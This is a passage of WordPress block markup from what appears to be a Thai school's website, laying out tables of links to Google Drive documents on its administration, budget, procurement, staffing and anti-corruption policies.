/wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a 